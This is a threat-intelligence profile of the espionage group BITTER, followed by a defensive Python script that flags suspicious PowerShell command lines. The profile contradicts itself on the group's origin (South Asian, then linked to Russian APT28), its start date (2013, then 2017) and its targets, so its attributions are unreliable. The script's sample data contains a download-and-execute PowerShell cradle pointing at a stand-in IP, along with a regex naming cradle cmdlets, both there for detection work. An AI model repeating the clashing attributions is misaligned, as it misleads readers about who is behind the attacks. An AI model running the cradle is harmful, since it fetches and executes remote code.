BITTER
MITRE: G1002
Bitter is a known alias of the APT group APT47.
BITTER is a suspected South Asian cyber espionage threat group that has been active since at least 2013. BITTER has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.
BITTER is an advanced persistent threat (APT) that targets industrial control systems and critical infrastructure, such as power plants, water treatment facilities, and transportation networks. It has been active since at least 2017 and uses a variety of techniques to evade detection by security software, including stealthy malware delivery methods, sophisticated encryption algorithms, and the use of legitimate tools like PowerShell for command-and-control (C&C) communication. BITTER is believed to be associated with Russian state-sponsored hacking groups, such as APT28/Fancy Bear or Sofacy Group.

Techniques, tactics and practices:

BITTER uses a variety of techniques to evade detection by security software, including stealthy malware delivery methods such as spear-phishing emails or watering hole attacks that target specific websites frequented by the intended victim. It also employs sophisticated encryption algorithms and uses legitimate tools like PowerShell for command-and-control (C&C) communication, making it difficult for traditional security measures to detect. Additionally, BITTER is known for a high degree of persistence in its attacks, often remaining undetected within an organization's network for extended periods before carrying out its intended actions.
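The profile above notes that PowerShell, a legitimate tool, is used for C&C and that this makes the activity hard to spot. The following is an added example, not part of the original profile and not code from any project, of how a defender can triage process-creation telemetry for PowerShell command-line traits that deserve a closer look (encoded commands, hidden windows, execution-policy bypass, download cradles, and an Office parent process). The event field layout, the sample events, the indicator names and the thresholds are assumptions constructed for this example.

```python
"""Triage process-creation events for PowerShell traits often seen in
living-off-the-land C2. Added example: the event layout below is a
simplified assumption, and every event is constructed, not real telemetry."""
import base64
import re

# Constructed sample events (assumed layout: host, parent image, image, command line).
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"},
    {"host": "ws02", "parent": "winword.exe", "image": "powershell.exe",
     # -enc payload is base64(UTF-16LE) of the harmless fragment "IEX (New-Object"
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc "
                "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "ws03", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.10/a')\""},
    {"host": "ws04", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Office parents spawning PowerShell are a classic spear-phishing follow-on (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Cmdlets and aliases that fetch and run remote content ("download cradle" vocabulary).
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression"
    r"|\biex\b|net\.webclient", re.I)


def _is_switch(token, full, min_len):
    """True if token is a dash/slash-prefixed abbreviation of the PowerShell switch
    `full`; powershell.exe accepts unambiguous prefixes, e.g. -enc for -EncodedCommand."""
    if not token.startswith(("-", "/")):
        return False
    body = token[1:].lower()
    return len(body) >= min_len and full.startswith(body)


def decode_encoded_command(b64):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE); '' if it is not one."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def powershell_indicators(event):
    """Return the indicator names that fire for one event (empty list if none)."""
    if event["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return []
    tokens = event["cmdline"].split()
    found = []
    scan_text = event["cmdline"]           # cradle search covers decoded payloads too
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if _is_switch(tok, "encodedcommand", 1):
            found.append("encoded_command")
            scan_text += " " + decode_encoded_command(tokens[i + 1] if nxt else "")
        elif _is_switch(tok, "windowstyle", 1) and nxt.startswith("hidden"):
            found.append("hidden_window")
        elif (_is_switch(tok, "executionpolicy", 2) or tok.lower() == "-ep") \
                and nxt == "bypass":
            found.append("policy_bypass")
    if CRADLE_RE.search(scan_text):
        found.append("download_cradle")
    if event["parent"].lower() in OFFICE_PARENTS:
        found.append("office_parent")
    return found


def triage(events):
    """Keep only events with at least one indicator, preserving input order."""
    hits = []
    for ev in events:
        ind = powershell_indicators(ev)
        if ind:
            hits.append({"host": ev["host"], "cmdline": ev["cmdline"], "indicators": ind})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['host']}: {len(hit['indicators'])} indicator(s) {hit['indicators']}")
        print(f"    {hit['cmdline']}")
```

The decoding step matters in practice: an operator who encodes the command line hides the cradle vocabulary from a plain string match, so the scan is run over the decoded UTF-16LE payload as well. The weighting is deliberately simple (count of indicators); a real deployment would tune it against the environment's own baseline of legitimate PowerShell use, since `-NoProfile -Command` from an administrator's console is normal and must not page anyone.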